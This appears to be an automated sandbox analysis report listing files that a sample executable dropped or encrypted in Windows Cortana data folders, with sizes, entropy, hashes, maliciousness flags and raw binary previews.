                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16713
                                                                                                                                                                                                    Entropy (8bit):7.987124425529482
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:4H4WcKwrasVCJ1LlsJA6hVWLQQmrSATazQsF0cfOtXO:LWkaeQalaQQflcsFDfWO
                                                                                                                                                                                                    MD5:A1871C43B6F3656B5EA94399F6A70703
                                                                                                                                                                                                    SHA1:2FADC868C4C13FD424EB13D75638C0F65C660E8A
                                                                                                                                                                                                    SHA-256:5C1E112731C644BEE199B24A76ABFC843ECB6CB06E680CBE8A80C4DDE09E7463
                                                                                                                                                                                                    SHA-512:3AC27C250C2B91C40AB0C836BA88F35D5A6EAB15E3C6F21192A00D3DB3593D6D7CE48D50694458F4AB1C063AA313293AA30CAF7B35BAE8D8A1F8DC70BB61CCAE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..xdhe.[.{J.....r...L...I.r......3....M..x.B9.s..W.MW@.zL.eWw.aj..o.W3.@.`P0.FTH.l.......JKE.u..&g.w.Q/V..u.....Ut.ir.To&..T=......gq.b&.6co.o.5.W..52.#..................6WMO...}....Pr.PD/.k....,..Q;.C..Hq..5&........{.B....Z...@e.@................._.:..cL@.[...H[..@.&u.(..t.@jSI.V..3..d&...8;%[....j.m.H4P..ix...\2G....B.x..N.D&H}....jK.V/.0....hh.k.m..Q7..=(,.rR...6t....0....Zz\..&.Y...f.....Z.sB..V.9.qw"..a..tqh..^.d.."..8....b........-N.....B.:.....Z(..W.QH#g5..AH.#..h8.!..I.x.*..g.&..m..0J.....6.P...%~..&.Cq...B...1.b.N.]..\ V.j..dp.H2....Otne..3H.qV...|..... 6.G.^I7.4..G.."?o.....x..t....Y.:...P.:.i.=.8..iW.....(....]...pE.5p.f!..qcW0<".....Bl...0...f.x...8....cKANY.U+...g.D.....%.G'..`.......ad...lX.L..r_R....d(.\_....=.gl...CSO$........;.._BI1.".qL..y.w./h..:...2...U...^..=.C0..wC..e.........).."......|.(...5+<.i.;~al.V+..E$.[^..`....^.:.D.\.P.Sz"=.....I!V..j)....In.).).G.W=U......K[{...^y..Fv......)C......7.Q...[-AK...@.z...\.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.chk
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.979843181548582
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:6pYUboFYgrk1S/Lt1NdqutCpT80Bj/W2eipgtsTR5Q0hmSbp:6p2Nrk0qutCpT80BLWDipgtsN5Q09
                                                                                                                                                                                                    MD5:2689B369177260BCFE55D36B66737ADA
                                                                                                                                                                                                    SHA1:BCC07B9F3F7F90E2C667DA454D8D8A8ABEA2ACD1
                                                                                                                                                                                                    SHA-256:5447050C69E87CFE610D2F1E573ECD3EB6F7FFC3ED548A8095B780E41C956156
                                                                                                                                                                                                    SHA-512:C0EBA144F7ABBF09BC01CBE1B214E6F90D7646B7DF647F8E4B95D2A090EE8EFD836C6B007804270AB26BE4329CE8CA65FA21AD0C50D6D459E66E5AAA5E7ED683
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: <....*=}J....1..U.kA)..-...R......*.....c-...w.'x..b1E...Z...w.'.....E4R.WPW.YN...4..;'.Rt.*.yf..]...*.....A..Z...s...k..^+9mB.#..n.W..y........_/..N.N'@..>.@e..../!...;...<..J.q.P.5A..P3..!.xd.v.KB.....Xq[.8..(..r..39Y..[..K.S...M|v.R..K..b0..).v. ..#$..Z...g>Hz.?.**...n:...%l]wF0....zb..S..1{.E..'8r7P....MLh-.t.. .c._....d.h.2.MU.....G.m..:.l.oc.RN...e...)*]..4...D.....M.b.]...Uh...Q>..J..+..m..U....3z.V.s....ki.(6f{^.t........1..L(K.{..G........q3`&cD.1..j5.....I.........|{.....IuL..2.X1..;...>.yx.........1E.q. ...1"..$d...e..+8....n.{..x_B..V6.!. Z...s.].............x.w>~h.o..."!.h.z.4.g.......+.W........o.$y.s.D..?...u:../.Z......Y.@......H.A,..%N.?..+......mk.q....U.E_uL?..?.X...p..O....u..T'J......6SVa6h$C..P,.....t,.l..lhQ.m.......b>..Nl..O..@..b*^Z=>9....@..C.M.L~5NQ..h....V5e.....J....DyA>>..`.....K....4..y.1nK.......E.0.>46/vd..8...:...:.~...-.=..6H.f3F|.....;w...p4..{..%.W3..`...,..9....\.8x..T...8.u..B%...7...7..2=.}<..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998846676254966
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:4/pgJnKA0oEdBktMzmCxmTN5FD/jcuNL6mxbiev/Ex0vTtWiIEqQbFyZy3c:EtCEjJ6wOFDfNmmxbxv/M0vhWvIbgy3c
                                                                                                                                                                                                    MD5:2C3EB2CFCD7C0662305438E28CA86C1C
                                                                                                                                                                                                    SHA1:22EDE5F0FBC608D9DB7FE17D9710CCEBC824211D
                                                                                                                                                                                                    SHA-256:E53B0257A566170DC1F1F829EB2F40A12EAEF8EB90DFC3B7DBD463A8F8243643
                                                                                                                                                                                                    SHA-512:EC4B31A6E0782D4ECFCAB8E896C7532B57BAC502C9303BFEFF9CA1D5259FF1C1320B463A324813CFFA0D973BA3277401E7788A7CC5D93342574525E581DAEBD2
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .b......=!..7es...t_...^......c....HF._....c......3.=f..."J.G...4....U|.7.%....R,.b.@t..&.o....u....K..9Z..]{u.:....l....I........{oL9..v.."%c..r.7W.7.....d....p.....2.'.....C...S...ID+..v.0o.#~....).....z?.....?....[.#.5.('.XV7....i.=(L_f.M...@..6..Yio..x[.h.F....-`.a. 3F.O..k,.........H...$BK.|........./\....q..0..7Z ..].E..R........H..U.G.V&`*..&..m....kK<.N..H.U.)..........i......l..Z.7.....j..^.2.......l...AH.K....T.w..r.+|cC..o.8..#.a|o4./O.4..H...W.....[......O........D...c.Sj...7.u..P{.6.r.......c...D.G..>...m.....e.@R0..u..}?..O8...s4.(+H...'A.`sP?m...D.ZW.....T...I{{..I.yp4..zs..........A.3.>.K]'i..]....y..i....f0.<..U.}..OH\1..c..K........c.!Q..2@.6...%?+....K..@.K....2..O......m...nE. ...z.."..0.h..Se..jG.8...P..1..#8Fx.2%^.........\.......w,'.<...J........:...w]a.m ..hGq./..aar.xY.R...N..q..V..B..+T.l.K.......$.m.*...@J.p4.?...z..%h.....4P....CsN...t.^..>. ...I..f...:(.....f..a...;.S.....*.(.+d.....J.0=TZP.rW.#.Ao...`....9
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbres00001.jrs
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.9987551319048436
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:etZC1wUP/U3RjRU0DVJzGB4PvDxiqAzmn1eNfBKrs/eOxsrJfuVqZv0SucJI5:etZKnUhBzG21e/5eOaFfuVqZMSzJa
                                                                                                                                                                                                    MD5:4EFBC550193D43D63EA1A6A502DF4B8C
                                                                                                                                                                                                    SHA1:69F40BDFA6D8CAE453385D5A2EB6AB286F7C8A85
                                                                                                                                                                                                    SHA-256:9DA533B91CEA4E549BC17F2C6F353D7D9EDEB0594AA3D6796C6B0B74E91C2C95
                                                                                                                                                                                                    SHA-512:9F392C4A8F2CB7DAC6F993965776DB3F7864FB3B84843B5A47D448F59B79D163EFC28BA7A1626C6F50B37419C31DD6810BA45FDE44D2E62F9EFA7D4CEFCCFDEC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: vr..^.g.S........K......+.t.h......../JMW..c........."..!].......F.F%Fl.T.... ..6@._...[.D.'...1..z0........~X`....Y..l..r.x..3........E....T...?h...~k..[1`,.T....X...`].p.....hn..=."@~..9...X#;M...f&m.mXM.vW*...HCUX~...L..7.)...).....<c.....M......Q..J.:.d.Q."e...4t..x......u/.....(.41....n.&..... v..C;..Fn..El....`V7[.[...f.;....,../..>R...d.L.b..-=t...N1..\.......m/...#.J\W.[....(..A.6|-.C..M./......d.kV$.Q.#?=?..i...tg..8....F...y>\....ZG;.U.o.....Th.@.b#....P.X.....!t.}....c.......yOF(....34....BK.I......8...t.......#.+..#.-.....L.....,a..... ..t......G0.W..S!..%..j...(..^w*iV..t..&N..&c.}..&.3zc0.k.Q....@.....A...`.........xTV..bk..%.....]W.'....6.....{..>..;.l.-..).!h)P.\....%g..s.[.]..`t+.j..x...A..u.h.p..AL>......L...ALB.........p.B.}1MB....oa.y7........B.I.....\..957.x...t..P*...?c.... 1r_3.g.|.].mzzD.t..........._..?......b.i.:...HT.1<....'u^bIM..-w9...U....pa..]<......k......c.zcQ..9..4...^R.Y...:......}e....:..=.H.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbres00002.jrs
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998694946536937
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:q65qn/gSswvsWuiGtPX2o6wDhGLJIrNlnQhfeaCDb67PYA086f9Jyd8VXgDpd5:Snu4JuiG52oNGLarYYb6r3d6FJydiXgh
                                                                                                                                                                                                    MD5:D1C8898E00354CB0ABF6A9B41222CEC6
                                                                                                                                                                                                    SHA1:9ADDA08145E11CEE956F4A6C147E02AD2544742D
                                                                                                                                                                                                    SHA-256:4E250CA3EE858158C09E0A017ED662BD51A8B4C8A832064E9FB051C4639BF034
                                                                                                                                                                                                    SHA-512:CFF691F65692828B67A09176F6487A26EC7604561B78334F039C2F7B3AB4CC1EA8C6C76890475561827D1F65B32737C44C79AA78240E76C9EB36CB28CE724783
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 02..+...p6.v...!...]5....D..F.X.Z".Y....'.t.b.?....B.%.3.h..d3\....:X#...w...Aa.i....V.1...&.....-...........3A.S..........Y.+Z.0..*~.z$H.k...F..U.ey..y........\.U.U;.6..T..T...~Q...|,.......5..7#.y9?.DC..`.t..P2...=j......H]2.7.q.G..+..:.... O....T.R..d..!/...k..>..V5.!....f....O.......w...lqo...Q.u...y.sz2..agG1.&.....nG.<;..C..z...K.9(/....gR2bow`&>..k..N|.........]..F...=5..H...K...k.....B...Y.d.0.N.w..N.Vf..`.<.g.[..P.o....X_&..j.Ju.xt... -.B6M....U..F..:!9..#_.;._....J.TK...p....Z......q;......G]......jYJ.KN.c.o..3*...2..Tw...E.=\.g...v....g.or.....L.q.0zl..]9.\.Fa...8D.....Q.o.P...c,.j..|.&......M.[.6..$ .}G...a.S..m..,....sM.{$a..0....9v...l.#..:[F8.{{".@t.......q..j...o4....Q....)...Y......^.....n..qx.8...:`oH..1kj..)..xK.fz.pFsYB.....k+.an.a..[.{.V.@.z..!.....=0.=_.....T.9.....2.J_.~.Ke..;...`..y...D.F.}\(..v..V......P ..Pn.......Y.P#)...e.n}.Y..V...r.e..!|.>.x..i.c.E...z.....bc#\c...s...I.w..*3k.xe..LA.n..!.x..7.....2..uS..5p
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbtmp.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998840010727601
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:loXRONDVYWeb/NfK8Iz9GCjvqSw4EWJL7p8erjiYAYLDl59b:O8DyWW8GCjo4vJL7vjiJUDl59b
                                                                                                                                                                                                    MD5:AB2B542E238B6682378BC5E037F4AEAE
                                                                                                                                                                                                    SHA1:BB828709490C5D20C65F0E6DD437AC08771C7D9E
                                                                                                                                                                                                    SHA-256:DA0403A4FD6782155E0CFAEBD73CE65D09234D5DB5D22511C81991945CCB649E
                                                                                                                                                                                                    SHA-512:EFE5B47E60414E213F5BEFA3ECDA0AA320CF3CDF1BF686660D39E7B8EEA081F0E48786B7EAD25A0BB76CF450133383E8CF03AEF3F87D212AD90387DA3C3DC86A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: @.I....L..q0.?. .+Q.fk7.+.....>o......}.7.8.....5)..(.u......a.j..y:.......w6..j#.VH..[".f...j....@E.!LPG[.Q...D.vly..WO..G....2&.`.#s....(%...;....P.....Sqt..`U.n... .i.]..b...H.n..7LxhN..+..9..aB..]..+...,w..J..f..o..;..~..+.#.._..`-.....ea:...0"nU.kAZ.@6..ag<Y..H....y. .}...........U.*K...Q^....-...t......*...H.{..Ga;A..I&0....X.....nrR...CLp...V8..Q3Z.U.....a.)|.".:.rXz.&/.uG...k.i,...._~(..zl|.g.:.91y.3.,......a;.N.U.....e...e.....,....=Jm.A.....S:.5....~4.Rd.......a.k......S<..L..wR....@.g.e.W$...g.Y.0.A.&....oY...JB...VN...i,.#...">..ej...1...o.Z?.h.......|~N..q5o.T.r.CbH..T@.....m.OB7..r.m.5.O.i......2..5xa....4.....m.<..}m...'L"}.oV.!.5..d..KE.......H&..L4.............q...J.U#.q.+E.....;pa..?.:.HJ.A...r,.....W...>(..M..X.....M...5*.....*.u1,%.cX...b..4..o...}.7...^..pK .(.r..H:a0'=q...a]/...rw..*i..m...,.....6....:$...g....&..3..@.;Z +|%..._.iB.rfR..M....N}.E.gEF..v.;(..;f.`..'U.J U...j.Ud!e\;.*L..KP.....6..ueY.0...D...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2b5975db-7e26-4662-a9e8-84951ed922a4}\0.0.filtertrie.intermediate.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20586
                                                                                                                                                                                                    Entropy (8bit):7.9922883439293955
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:QSAErSwgo7Q9m4BxFMp4RYteRd3iTVxKpgEyUCM3exaS0onVEbyeMuA:QySRok9m4vFK4R1iT6gEyUCMCAonmq
                                                                                                                                                                                                    MD5:06BF8774D5E3A861786E0325B6EE6B46
                                                                                                                                                                                                    SHA1:E3B70EFD273D1E2C1B21A182017303351965BEFE
                                                                                                                                                                                                    SHA-256:A4A0F386C647588CA863071869A4F373DE7A3BF627A601B6A1E144C228D57B2C
                                                                                                                                                                                                    SHA-512:13511A9A8C0838EF93F37A554811B5448C9E7301009E4785CADEFF2C737A2ECA33D4EB5812F0FDBA9285F2D98E94BE13AD74E2C3544800779A1EB195E6DFDB84
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: >l.:...._...u."..W.5.2W........<...\...H ..k`c..=.0I.U.y`G..]Z<@t..Tk.x7!..]sn.G...c..+.ml."J<.$..C>4.h.|0...C..yB#3..xt.e).=....;82..l.v....-.Fc...,.............`...+;....{r....rS^...U.2.ao%....M.f@P\A........`8.,..rYN...<....,......o.E'..X.......3.W.@xIFFK.;...*...+..\..B..*....${..v"x.hNkk?.....~...d.9@.\.y.,..8]...+.B..RV..?$.....VP...../...`o....S......_.....f]3_.7..NV.&._?.d.]....Gt...o......+./U..L.1..&.^.ij'.U.h=..*..}hrN.;.l..2.{...j..K...N...A.a.....u..E........w.......n...=s.@2./......o.<.%.{m.R|.|'...r.W.....se.R."b..4....r....;D.*z..P|R..s.r..T...;....S.a...i..$.Mx.%+~*..'u.....U4D.gPZ...j..D(.7...mD..QzA.d...:.g..Q).....+...G...Z.v..U....f...._..#0.`NMIO.K _.y.$w.a...+h.....Y?. .T...X...,U...8....:.H........Y..P.j..7}AZ.)*.qt79..-Wf.\...........L.....r..6u...tL..?YC....6....6....?.*<........P&...H.)6..Q#.YC`[..#.@..C...5..u...} .] .....c.?Y.."......@gu.M.S.TN.4...c}. ..`.g.qu...h.J..t.).-...kF..F[,~..`
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2b5975db-7e26-4662-a9e8-84951ed922a4}\Apps.ft
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):27483
                                                                                                                                                                                                    Entropy (8bit):7.992428427726998
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:Du7sxEZlG92VTjUCUUo3kKRaRPusGfXGDKQoKYNXfYcpPtB9ag6w/PD3iqzYEvrh:gsxWjF0Rx/NQTQPXJajqP7bYE6wqYhL5
                                                                                                                                                                                                    MD5:19C41A721436C071456E3D2B6CE76FF1
                                                                                                                                                                                                    SHA1:1EF561C300C8040276CACD971E64A4780B4BD9FD
                                                                                                                                                                                                    SHA-256:80B8DD5B7D8892F3BCFD186FE45082F77803F6338D666C523933276AD8139930
                                                                                                                                                                                                    SHA-512:06EFBF5DACA5420694BC1D0A2A86C528CB360D24ABD8CE579D605893B44FFB95ACB2AC2C09283C8A24757FBB3AD9B4F34FF773C38B7FF7C9C9466B1ED89E6F0F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ."..$.....P.Pg.D..uo....L...0..-........i..z....J..s.",....\mY^.._..@.?bEPE5....c......A..].[.tv..O.P...2M.~.../.....i.'.kZ..nmJU9X...+....d@.m1.*...@.0L7.usIm.Z............A..[.....5H....jz....<..9...T...0\......P?.!).p^...u.5.t:O...f._1..........B...or.)n.Q....eb..V,.....V.D5.....e..S.C...o.."a.Uyoi..k...i1!..o.3.UYzs9V.B.9..k..@..<.8.".y|<.0cL=.c.^G*H.R.r.,E......k&6.1.Sht.n..B.#.>..?.E.....j......G^..Q.....2..../..J.H.I...J..O..Z.!s.~~..e..#..?.+Hc..C.R...d.......[......B...!.^.9C3.#-...c.R..9L.6..b.......CD....6...j.m.;...#..D....l>,H+. ..+C..Q...w....qt../.?.#+.^.....Sjl.].C...[..B...#.._.D|...t....+E.v....5!........B.8Y..m..4@.....g..9.c.V. .CV>..;..t...<.Uo..O.E.C......._r....(3.?r..g..<..:..S9p`..Ku...}..-d.wp;.\e=AA^.s:!l...l8.....4YJ.8.......X{..L.}N.0..FQ..d.;.o.M...|/...dL6....+.>..&~..p....L..6tx.uh...[....p...u...k.'.5g~....w.... .`..<.[.i$...lW.N...@.]....R.....%C.E.6...+|.L$.....i..l..&..Iq....>*.f.......l.`..C_...k..oTV
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2b5975db-7e26-4662-a9e8-84951ed922a4}\Apps.index
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):145970
                                                                                                                                                                                                    Entropy (8bit):7.998973021071634
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:47yWXbcW3RytKSzXB0Pz0MjqRmVk078vK:cy0r3GKSDmPiy8y
                                                                                                                                                                                                    MD5:24B9904A449AD9847A90B3B458BC89AF
                                                                                                                                                                                                    SHA1:FF127B9A486704FFA4616572AC26D4241E1628B1
                                                                                                                                                                                                    SHA-256:43698C3062B1E5A1AEDF4542F39E70D91779801C103BF7FE7C5FB77F68BA422D
                                                                                                                                                                                                    SHA-512:CC7C721C51C3203A057DBDCB5ECB06EC3EEF82CE0B69E10FFC4A380FACA3F3F65F87C472320179867DA0D8CC394DC9DF7A5BCE9F1F2DC78867DFD7BABF1DD566
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Y.V..p#...?.].i....o.h........(..p6...=W..,.k.....0.3xO.q..g.j...Nh%B...f.......>@.......1E..............m.P.%?\c..L.T.S.fiVo.0'..&.B...x^#N(.)..s2.N...Z"..Y..........`(....O&OC ....O...$.q.?.._.3....9+.X...[G..*.#..E...3.b.O.VN.M..F..rjKr +UDG.'..R.nPJ$.2....A<...1...s.W.......Hw5...;....V.e-./..u...O4....v.j$..!i...B~..8{.....}.C!).#K...K0s..|..YV..........}..R(4m.e.b.....?.Ma..1...+$.s..FcJ.*Ne}...+-.h......A.4.5..."....Fv.../.....W...<.,..q......d*.=.H]....~u.~.....4....}.... ?.......@..!B..#Uh]..h.Z....j.H.w=1...B.........%.v..dr6.....$....&.!....."!.."g,/..ws,a7X.....Cb]h.o..)@...e.(')o..]...n.'...........3vx4.%>.;./....d.....`=.........n&....7e....w.......y......SK..f..ga..#..v.......T..Co.........g(o[.p.l.A%9....\..?t~.h.......<.E..(a.R.m..H...._..H....^.6...:{E...... ...FI.G..t.*<R&.7?.1.V.p..nL6.l*.......C.......w. .7..i.e.....agi.Rc...?..j..b.'(.s..8n..d5WL..6.0."..O.$.h=.4UR.:%`x.PbP...0..Q.e...A..J....z:.4... .X...3...|Nr.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{698271a8-fd48-418e-b05c-a93ca58fd2e6}\0.0.filtertrie.intermediate.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20586
                                                                                                                                                                                                    Entropy (8bit):7.989996839550974
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:gQGG65XNorF58JFSsh+/wikHBNpA3Rwa/42pAbv1q61uzmgfS/YV:gzGyX+58JFxhAwBH84fbtVuqevV
                                                                                                                                                                                                    MD5:6628D09181CEFA1C92EAD06D138B855D
                                                                                                                                                                                                    SHA1:A8ACF74232D6A194E63DDB91585F96251A7BA907
                                                                                                                                                                                                    SHA-256:EEF0CD23E0D50F5BBA676C8D3A98C9D03CE8AF15C4B5984A6BB0CEEDBAA2B8F4
                                                                                                                                                                                                    SHA-512:45BA0F3D67D9893A98B2BA6CD9B73340042F36CB0E905295606FF3C23BB66B3583AE63F6A3BEF1903077262FC028FC1B338F8F78F8CC4C2106331FC59CF419F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..aY"I....8F.DH.......'.a,I...$.9@./6.......*...E@..Un..Sn...&.....OIV<. ..D.....!.sD4Iv.l.u...S.......Ph..{.N..y..6j..........#@....d.rGAo.....]G...*$...+8R....^.DL...m.Fy...$Cm~....BS.tA....3.\!..~..m<..?g.T._.t.].....W..c..84..... %...(...K..Ow.......;.iZ8>.z....|...J(...ett.7#{.{9.1\......6f...Uv:e....w.i.......8.)\Z....n...Q.....!..4."....C.;.....1e4C..S.N.k...8;a.....-=S..(....}.$7.E..[..........P...xP...4....... j-.'d5!...?.<....A..d.......O....'o.O..z.....M.F.X!.).m*t.E..M.j....kZ.......S......4..S..l8.P,...Y..-.Wl...i(z..Er.}A...U...ZdWl.P.(QN.......(...c...<....g8p.D.~=..b.[g.&[.U.(..d K"S..A...M....R..h.".;\1..q...w."..c.[.\\.V.|..#.....]2.....c..#w7...B,...{....8VF(cV..A......k........},..X......\.4.......Q....|.{N.,...)..2.n.-...!0%...9.X:G.L4.?(..4`D.7(.....y...$....f..*..?O..e.$.f^..^..>. ........8$.....u......F.........k5h..=t...y...n.Cm.p*K%.L..s.}..`._..A+n.{......,T...1r.Bm#....."X...q......"..f....fg........1<..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{698271a8-fd48-418e-b05c-a93ca58fd2e6}\Apps.ft
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):27483
                                                                                                                                                                                                    Entropy (8bit):7.993019001607844
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:CkkDgjHdudMlbQT8AoYZ0bFqfa8hfeH5TtSNL:zkDkwdgQsAUZti
                                                                                                                                                                                                    MD5:69D77FFC4DB5F4A47DE296387EEF5F34
                                                                                                                                                                                                    SHA1:F9973AED1D95AF1E2C33A6078E9B771404C6742E
                                                                                                                                                                                                    SHA-256:80B04C818EFA499CCABC91A37CA85FA7EE757E93765D50CCB3594E6AD3A58FFB
                                                                                                                                                                                                    SHA-512:9B5876D2EFC44A74A46C6659FEE52550FAC9B8AB36F7197A0CD775816B30F38DFEA2B55309D472D455284857C67AFD0D00C5FF4FAAD4AD7BA519881BDF61C4D5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..D..`.tY.(..{.......:..+..g^....Nn.....&oV..9#k$...#,.c....Q..Z.W/...,..&..^.M..;...DuO..a..._.<.-.o....3.O...@p...).V\...1..{9...Y...m..E.2.z..I....<....l]vAB.w..Gq+."v.....l.x'$q..k.....}..@B...a./k\.S$7..A.'(..<..>%e.8.j..W+..Go..*.cZ.p{.wz.I.z..W_.Li....0Q.S"..iQ.]....Z.b7L....$.U..ddnJ.z.5...\-O.A.k.(B......3(8.....(...U.')...-#..6..!....9....D@d.jKy.yE..z..R...J.(._`...ko.o,\....A...K..B_d..t......0K.m.x.....+i....E,..a...}..V.g.e+{..aO.g.....z..`L ..Q.....w...KV..X....z..k..7.9U.l.nDm@.`G^.........PE......Ec..(.R.".C.w..]A0R<.+..O.....4....pL..Y.)...awTu....'U.+3.ir..f+Z.{..7. ,'.5[..C...VS..gR..4.Z.......U.i.U.K...jv."%.....7.a.i... .....1E...V....Z..~.Jv6.m....G.6...,....K37.c:nrr.....9..N.._Wm...I.H... S..Mn....L.....V....4......*..2.Zr.G..J..j......hu3...6.l..4..U....j......?....".H+.>..^.^...R4...4.u1..SID...#J......5.........^._....)z.!.........W.....&fd%.v..r..q....S...-X..........g...i1..b.i[[hF;..N.a.H....}..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{698271a8-fd48-418e-b05c-a93ca58fd2e6}\Apps.index
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):146272
                                                                                                                                                                                                    Entropy (8bit):7.9987598745149135
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:auYa11zFVv2/HZTF6tEgbRhaY/hlyszLZXZ8UkGePu//33PyN:ada11zFt2/HCtE8RhayySNYGe8qN
                                                                                                                                                                                                    MD5:65C56FCFE1E22F707D2F4B45FC4AD879
                                                                                                                                                                                                    SHA1:8E57FE2E04FD0EF2FD46F8845F0A818E3DA15CFC
                                                                                                                                                                                                    SHA-256:4F9986D86653D15B98D9CE6947ACECE1838A4236A5245DF4618B2C936FCA218B
                                                                                                                                                                                                    SHA-512:3EBECF40B4C20C79DD7F2115782C146877F0AD9103D4EB1CE45155F8A3517EA2444DB2B2920E16F6D8D3582B92CFB2EEF2D5489295B100A6904DF72218828956
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
